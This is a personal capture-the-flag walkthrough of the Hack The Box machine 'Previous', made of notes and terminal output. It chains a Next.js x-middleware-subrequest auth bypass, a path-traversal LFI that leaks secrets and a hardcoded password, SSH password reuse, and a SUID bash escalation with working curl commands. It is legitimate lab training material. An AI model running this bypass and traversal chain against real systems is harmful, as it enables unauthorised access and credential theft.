Previous
User
~/ctf/htb/en_cours $ nmap -sC -sV 10.10.11.83
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-06 20:02 +0100
Nmap scan report for previous.htb (10.10.11.83)
Host is up (0.024s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: PreviousJS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.74 seconds
~/ctf/htb/en_cours $ dirb http://previous.htb/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Dec 6 21:15:35 2025
URL_BASE: http://previous.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://previous.htb/ ----
+ http://previous.htb/api (CODE:307|SIZE:35)
+ http://previous.htb/apis (CODE:307|SIZE:36)
+ http://previous.htb/cgi-bin/ (CODE:308|SIZE:8)
+ http://previous.htb/docs (CODE:307|SIZE:36)
+ http://previous.htb/docs41 (CODE:307|SIZE:38)
+ http://previous.htb/docs51 (CODE:307|SIZE:38)
+ http://previous.htb/signin (CODE:200|SIZE:3481)
-----------------
END_TIME: Sat Dec 6 21:17:53 2025
DOWNLOADED: 4612 - FOUND: 7
~/.cache/yay/naabu $ nuclei -target http://previous.htb/
[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /home/ygp4ph/nuclei-templates
[WRN] Found 2 templates with runtime error (use -validate flag for further examination)
[INF] Current nuclei version: v3.6.0 (latest)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 8910
[INF] Executing 8908 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 2 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1862 (Reduced 1749 Requests)
[INF] Using Interactsh Server: oast.pro
[waf-detect:nginxgeneric] [http] [info] http://previous.htb/
[ssh-server-enumeration] [javascript] [info] previous.htb:22 ["SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13"]
[ssh-password-auth] [javascript] [info] previous.htb:22
[ssh-sha1-hmac-algo] [javascript] [info] previous.htb:22
[ssh-auth-methods] [javascript] [info] previous.htb:22 ["["publickey","password"]"]
[openssh-detect] [tcp] [info] previous.htb:22 ["SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13"]
[old-copyright] [http] [info] http://previous.htb/ ["\u00a9 2077"]
[http-missing-security-headers:permissions-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:x-frame-options] [http] [info] http://previous.htb/
[http-missing-security-headers:x-content-type-options] [http] [info] http://previous.htb/
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://previous.htb/
[http-missing-security-headers:clear-site-data] [http] [info] http://previous.htb/
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:content-security-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:referrer-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:strict-transport-security] [http] [info] http://previous.htb/
[nginx-eol:version] [http] [info] http://previous.htb/ ["1.18.0"]
[nginx-version] [http] [info] http://previous.htb/ ["nginx/1.18.0"]
[options-method] [http] [info] http://previous.htb/ ["GET","HEAD"]
[tech-detect:next.js] [http] [info] http://previous.htb/
[tech-detect:nginx] [http] [info] http://previous.htb/
[caa-fingerprint] [dns] [info] previous.htb
[INF] Scan completed in 1m. 24 matches found.
/
/signin
/docs
/docs/[section]
/docs/components/layout
/docs/components/sidebar
/docs/content/examples
/docs/content/getting-started
/api
/api/auth/callback/credentials
/api/download
And those are all the paths mentioned in the various JS files.
In the source code, all links to JS files start with /_next/static/chunks/, and apparently those are Next.js libs, which makes sense given the site's name lol.
All these pages require a login.
On the page there is a contact, jeremy@previous.htb, which could be useful for the login.
Tried an SQLi: nothing works and loading is super slow.
I need to try an auth bypass.
I search for "nextjs auth bypass".
I couldn't figure out which version it is, so I tested all of them and this one works:
~/ctf/htb/en_cours $ curl -I -X GET 'http://previous.htb/docs' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 06 Dec 2025 21:48:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 3353
Connection: keep-alive
X-Powered-By: Next.js
ETag: "83h4wb4nfw2l1"
Vary: Accept-Encoding
So we're on version 13.2.0.
Now I do it in Burp.
I'm logged in.
I browse the site, and on the examples page we notice that examples can be downloaded:
<p>Download the full example <a href="/api/download?example=hello-world.ts">here</a>!</p>
LFI:
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../../../../../../../etc/passwd' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
Only two have a shell: root and node.
I need to dig through the source code to find an RCE.
auth bypass > lfi > sourcecode > rce > revshell > user > root
Check whether the interface is indeed the recommended one.

Tried with the package.json via the LFI, in vain.
Well, nothing I'm looking for works.
I need to find information about the app's source code.
I go back to exploring the page.
I download the full hello world.
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../package.json' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
{
"private": true,
"scripts": {
"dev": "next dev",
"build": "next build"
},
"dependencies": {
"@mdx-js/loader": "^3.1.0",
"@mdx-js/react": "^3.1.0",
"@next/mdx": "^15.3.0",
"@tailwindcss/postcss": "^4.1.3",
"@tailwindcss/typography": "^0.5.16",
"@types/mdx": "^2.0.13",
"next": "^15.2.2",
"next-auth": "^4.24.11",
"postcss": "^8.5.3",
"react": "^18.2.0",
"react-dom": "^18.2.0",
"tailwindcss": "^4.1.3"
},
"devDependencies": {
"@types/node": "22.14.0",
"@types/react": "19.1.0",
"typescript": "5.8.3"
}
}
OK, actually I simply had to use a relative path (I was guessing like an idiot).
I look for the environment variables.
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../.env' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
NEXTAUTH_SECRET=82a464f1c3509a81d5c973c31a23c61a
Generated token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJqZXJlbXkiLCJlbWFpbCI6ImplcmVteUBwcmV2aW91cy5odGIiLCJhZG1pbiI6dHJ1ZSwiaWF0IjoxNTE2MjM5MDIyfQ.JS07CbQ534th6vJ4MExbyAT_DslRDIETnZsRIAe-nQE
It doesn't work.
I keep exploring.
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../../../../../proc/self/cmdline' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' \
> -o o
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 15 100 15 0 0 120 0 --:--:-- --:--:-- --:--:-- 120
~/ctf/htb/en_cours $ \cat o
next-server (v%
~/ctf/htb/en_cours $ strings o
next-server (v
Well...
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../../../../../proc/self/environ' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' \
-o o
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 216 100 216 0 0 1594 0 --:--:-- --:--:-- --:--:-- 1588
~/ctf/htb/en_cours $ cat o
[bat warning]: Binary content from file 'o' will not be printed to the terminal (but will be present if the output of 'bat' is piped). You can use 'bat -A' to show the binary file contents.
~/ctf/htb/en_cours $ strings o
NODE_VERSION=18.20.8
HOSTNAME=0.0.0.0
YARN_VERSION=1.22.22
SHLVL=1
PORT=3000
HOME=/home/nextjs
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
NEXT_TELEMETRY_DISABLED=1
PWD=/app
NODE_ENV=production
Interesting: I'm in /app when I do my LFI.
I look at everything there is in /app.
We have the app router pages.
Apparently manifest.json is auto-generated and is used for routing requests in prod.
Test with routes-manifest.json:
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../.next/routes-manifest.json' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
{
"version": 3,
"pages404": true,
"caseSensitive": false,
"basePath": "",
"redirects": [
{
"source": "/:path+/",
"destination": "/:path+",
"internal": true,
"statusCode": 308,
"regex": "^(?:/((?:[^/]+?)(?:/(?:[^/]+?))*))/$"
}
],
"headers": [],
"dynamicRoutes": [
{
"page": "/api/auth/[...nextauth]",
"regex": "^/api/auth/(.+?)(?:/)?$",
"routeKeys": {
"nxtPnextauth": "nxtPnextauth"
},
"namedRegex": "^/api/auth/(?<nxtPnextauth>.+?)(?:/)?$"
},
{
"page": "/docs/[section]",
"regex": "^/docs/([^/]+?)(?:/)?$",
"routeKeys": {
"nxtPsection": "nxtPsection"
},
"namedRegex": "^/docs/(?<nxtPsection>[^/]+?)(?:/)?$"
}
],
"staticRoutes": [
{
"page": "/",
"regex": "^/(?:/)?$",
"routeKeys": {},
"namedRegex": "^/(?:/)?$"
},
{
"page": "/docs",
"regex": "^/docs(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs(?:/)?$"
},
{
"page": "/docs/components/layout",
"regex": "^/docs/components/layout(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/components/layout(?:/)?$"
},
{
"page": "/docs/components/sidebar",
"regex": "^/docs/components/sidebar(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/components/sidebar(?:/)?$"
},
{
"page": "/docs/content/examples",
"regex": "^/docs/content/examples(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/content/examples(?:/)?$"
},
{
"page": "/docs/content/getting-started",
"regex": "^/docs/content/getting\\-started(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/content/getting\\-started(?:/)?$"
},
{
"page": "/signin",
"regex": "^/signin(?:/)?$",
"routeKeys": {},
"namedRegex": "^/signin(?:/)?$"
}
],
"dataRoutes": [],
"rsc": {
"header": "RSC",
"varyHeader": "RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch",
"prefetchHeader": "Next-Router-Prefetch",
"didPostponeHeader": "x-nextjs-postponed",
"contentTypeHeader": "text/x-component",
"suffix": ".rsc",
"prefetchSuffix": ".prefetch.rsc",
"prefetchSegmentHeader": "Next-Router-Segment-Prefetch",
"prefetchSegmentSuffix": ".segment.rsc",
"prefetchSegmentDirSuffix": ".segments"
},
"rewriteHeaders": {
"pathHeader": "x-nextjs-rewritten-path",
"queryHeader": "x-nextjs-rewritten-query"
},
"rewrites": []
}
We have "page": "/api/auth/[...nextauth]",
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../../app/.next/server/pages/api/auth/%5B...nextauth%5D.js' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' \
> -o -
"use strict";(()=>{var e={};e.id=651,e.ids=[651],e.modules={3480:(e,n,r)=>{e.exports=r(5600)},5600:e=>{e.exports=require("next/dist/compiled/next-server/pages-api.runtime.prod.js")},6435:(e,n)=>{Object.defineProperty(n,"M",{enumerable:!0,get:function(){return function e(n,r){return r in n?n[r]:"then"in n&&"function"==typeof n.then?n.then(n=>e(n,r)):"function"==typeof n&&"default"===r?n:void 0}}})},8667:(e,n)=>{Object.defineProperty(n,"A",{enumerable:!0,get:function(){return r}});var r=function(e){return e.PAGES="PAGES",e.PAGES_API="PAGES_API",e.APP_PAGE="APP_PAGE",e.APP_ROUTE="APP_ROUTE",e.IMAGE="IMAGE",e}({})},9832:(e,n,r)=>{r.r(n),r.d(n,{config:()=>l,default:()=>P,routeModule:()=>A});var t={};r.r(t),r.d(t,{default:()=>p});var a=r(3480),s=r(8667),i=r(6435);let u=require("next-auth/providers/credentials"),o={session:{strategy:"jwt"},providers:[r.n(u)()({name:"Credentials",credentials:{username:{label:"User",type:"username"},password:{label:"Password",type:"password"}},authorize:async e=>e?.username==="jeremy"&&e.password===(process.env.ADMIN_SECRET??"MyNameIsJeremyAndILovePancakes")?{id:"1",name:"Jeremy"}:null})],pages:{signIn:"/signin"},secret:process.env.NEXTAUTH_SECRET},d=require("next-auth"),p=r.n(d)()(o),P=(0,i.M)(t,"default"),l=(0,i.M)(t,"config"),A=new a.PagesAPIRouteModule({definition:{kind:s.A.PAGES_API,page:"/api/auth/[...nextauth]",pathname:"/api/auth/[...nextauth]",bundlePath:"",filename:""},userland:t})}};var n=require("../../../webpack-api-runtime.js");n.C(e);var r=n(n.s=9832);module.exports=r})();
We have e.password===(process.env.ADMIN_SECRET??"MyNameIsJeremyAndILovePancakes")
MyNameIsJeremyAndILovePancakes
By the way, I was right about jeremy at the start.
OK, I've spent 20 minutes trying to log in to the site with these creds, but it was just simple password reuse, so SSH login and I have the user.
Root
-bash-5.1$ ls
docker user.txt
-bash-5.1$ cat docker/
cat: docker/: Is a directory
-bash-5.1$ cd docker/
-bash-5.1$ ls
docker-compose.yml previous
-bash-5.1$ cat docker-compose.yml
services:
next:
build: previous
restart: unless-stopped
ports:
- "127.0.0.1:3000:3000"
-bash-5.1$
-bash-5.1$ cd previous/
-bash-5.1$ ls
app.json components Dockerfile lib middleware.ts next.config.mjs package.json package-lock.json pages postcss.config.mjs public styles tsconfig.json
-bash-5.1$ cat Dockerfile
# syntax=docker.io/docker/dockerfile:1
FROM node:18-alpine AS base
# Install dependencies only when needed
FROM base AS deps
# Check https://github.com/nodejs/docker-node/tree/b4117f9333da4138b03a546ec926ef50a31506c3#nodealpine to understand why libc6-compat might be needed.
RUN apk add --no-cache libc6-compat
WORKDIR /app
# Install dependencies based on the preferred package manager
COPY package.json yarn.lock* package-lock.json* pnpm-lock.yaml* .npmrc* ./
RUN \
if [ -f yarn.lock ]; then yarn --frozen-lockfile; \
elif [ -f package-lock.json ]; then npm ci; \
elif [ -f pnpm-lock.yaml ]; then corepack enable pnpm && pnpm i --frozen-lockfile; \
else echo "Lockfile not found." && exit 1; \
fi
# Rebuild the source code only when needed
FROM base AS builder
WORKDIR /app
COPY --from=deps /app/node_modules ./node_modules
COPY . .
# Next.js collects completely anonymous telemetry data about general usage.
# Learn more here: https://nextjs.org/telemetry
# Uncomment the following line in case you want to disable telemetry during the build.
ENV NEXT_TELEMETRY_DISABLED=1
RUN \
if [ -f yarn.lock ]; then yarn run build; \
elif [ -f package-lock.json ]; then npm run build; \
elif [ -f pnpm-lock.yaml ]; then corepack enable pnpm && pnpm run build; \
else echo "Lockfile not found." && exit 1; \
fi
# Production image, copy all the files and run next
FROM base AS runner
WORKDIR /app
ENV NODE_ENV=production
# Uncomment the following line in case you want to disable telemetry during runtime.
ENV NEXT_TELEMETRY_DISABLED=1
RUN addgroup --system --gid 1001 nodejs
RUN adduser --system --uid 1001 nextjs
COPY --from=builder /app/public ./public
# Automatically leverage output traces to reduce image size
# https://nextjs.org/docs/advanced-features/output-file-tracing
COPY --from=builder --chown=nextjs:nodejs /app/.next/standalone ./
COPY --from=builder --chown=nextjs:nodejs /app/.next/static ./.next/static
USER nextjs
EXPOSE 3000
ENV PORT=3000
# server.js is created by next build from the standalone output
# https://nextjs.org/docs/pages/api-reference/config/next-config-js/output
ENV HOSTNAME="0.0.0.0"
CMD ["node", "server.js"]
The Next.js app is hosted in a Docker container exposed on localhost:3000 with port forwarding.
-bash-5.1$ sudo -l
Matching Defaults entries for jeremy on previous:
!env_reset, env_delete+=PATH, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jeremy may run the following commands on previous:
(root) /usr/bin/terraform -chdir\=/opt/examples apply
-bash-5.1$ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-xr-x 1 root root 40496 Feb 6 2024 /usr/bin/newgrp
-rwsr-xr-x 1 root root 72072 Feb 6 2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55680 Apr 9 2024 /usr/bin/su
-rwsr-xr-x 1 root root 35200 Apr 9 2024 /usr/bin/umount
-rwsr-xr-x 1 root root 44808 Feb 6 2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 35200 Mar 23 2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 232416 Jun 25 12:48 /usr/bin/sudo
-rwsr-sr-x 1 root root 1396520 Mar 14 2024 /usr/bin/bash
-rwsr-xr-x 1 root root 59976 Feb 6 2024 /usr/bin/passwd
-rwsr-xr-x 1 root root 47488 Apr 9 2024 /usr/bin/mount
-rwsr-xr-x 1 root root 72712 Feb 6 2024 /usr/bin/chfn
-rwsr-xr-- 1 root messagebus 35112 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 338536 Apr 11 2025 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 18736 Feb 26 2022 /usr/libexec/polkit-agent-helper-1
-bash-5.1$ /usr/bin/terraform
Usage: terraform [global options] <subcommand> [args]
The available commands for execution are listed below.
The primary workflow commands are given first, followed by
less common or more advanced commands.
Main commands:
init Prepare your working directory for other commands
validate Check whether the configuration is valid
plan Show changes required by the current configuration
apply Create or update infrastructure
destroy Destroy previously-created infrastructure
All other commands:
console Try Terraform expressions at an interactive command prompt
fmt Reformat your configuration in the standard style
force-unlock Release a stuck lock on the current workspace
get Install or upgrade remote Terraform modules
graph Generate a Graphviz graph of the steps in an operation
import Associate existing infrastructure with a Terraform resource
login Obtain and save credentials for a remote host
logout Remove locally-stored credentials for a remote host
metadata Metadata related commands
modules Show all declared modules in a working directory
output Show output values from your root module
providers Show the providers required for this configuration
refresh Update the state to match remote systems
show Show the current state or a saved plan
stacks Manage HCP Terraform stack operations
state Advanced state management
taint Mark a resource instance as not fully functional
test Execute integration tests for Terraform modules
untaint Remove the 'tainted' state from a resource instance
version Show the current Terraform version
workspace Workspace management
Global options (use these before the subcommand, if any):
-chdir=DIR Switch to a different working directory before executing the
given subcommand.
-help Show this help output or the help for a specified subcommand.
-version An alias for the "version" subcommand.
Looking up information on terraform (it's written in Go).
So I can only do:
/usr/bin/sudo /usr/bin/terraform -chdir\=/opt/examples apply
I cd to the directory where I can do that.
-bash-5.1$ pwd
/opt/examples
-bash-5.1$ ls -la
total 28
drwxr-xr-x 3 root root 4096 Dec 7 16:09 .
drwxr-xr-x 5 root root 4096 Aug 21 20:09 ..
-rw-r--r-- 1 root root 18 Apr 12 2025 .gitignore
-rw-r--r-- 1 root root 576 Aug 21 18:15 main.tf
drwxr-xr-x 3 root root 4096 Aug 21 20:09 .terraform
-rw-r--r-- 1 root root 247 Aug 21 18:16 .terraform.lock.hcl
-rw-r--r-- 1 root root 1097 Dec 7 16:09 terraform.tfstate
-bash-5.1$ cat main.tf
terraform {
required_providers {
examples = {
source = "previous.htb/terraform/examples"
}
}
}
variable "source_path" {
type = string
default = "/root/examples/hello-world.ts"
validation {
condition = strcontains(var.source_path, "/root/examples/") && !strcontains(var.source_path, "..")
error_message = "The source_path must contain '/root/examples/'."
}
}
provider "examples" {}
resource "examples_example" "example" {
source_path = var.source_path
}
output "destination_path" {
value = examples_example.example.destination_path
}
I check whether main.tf has a misconfig that would allow an RCE.
None.
If I want to use terraform apply I need an exploit file with an RCE in it (or directly a cat of the flag).
I don't have write permissions on the interesting files.
I can't create a file here either, yet it's the only place where I can sudo.
# Source - https://stackoverflow.com/a
# Posted by Maaz A. malik
# Retrieved 2025-12-07, License - CC BY-SA 4.0
resource "aws_instance" "web" {
# ...
provisioner "local-exec" {
command = "echo ${self.private_ip} >> private_ips.txt"
}
}
Attempt at path hijacking to put my payload in /tmp and then export PATH.
Except sudo has an anti-path-hijacking protection (secure_path).
Well, that's not the right way in; back to my commands.
(Thanks OSCP.)
Earlier:
I'm now learning that this is not normal:
-rwsr-sr-x 1 root root 1396520 Mar 14 2024 /usr/bin/bash
Here I can execute it directly and it will run as root lol.
I need to find a way to turn this info into a shell.
From what I understood:
Normally, if /bin/bash is executed with SUID privileges (i.e. the effective user is not the same as the real user), the SUID is dropped and it ends up running as the real user.
-p prevents that (/bin/bash -p).
And I'm root.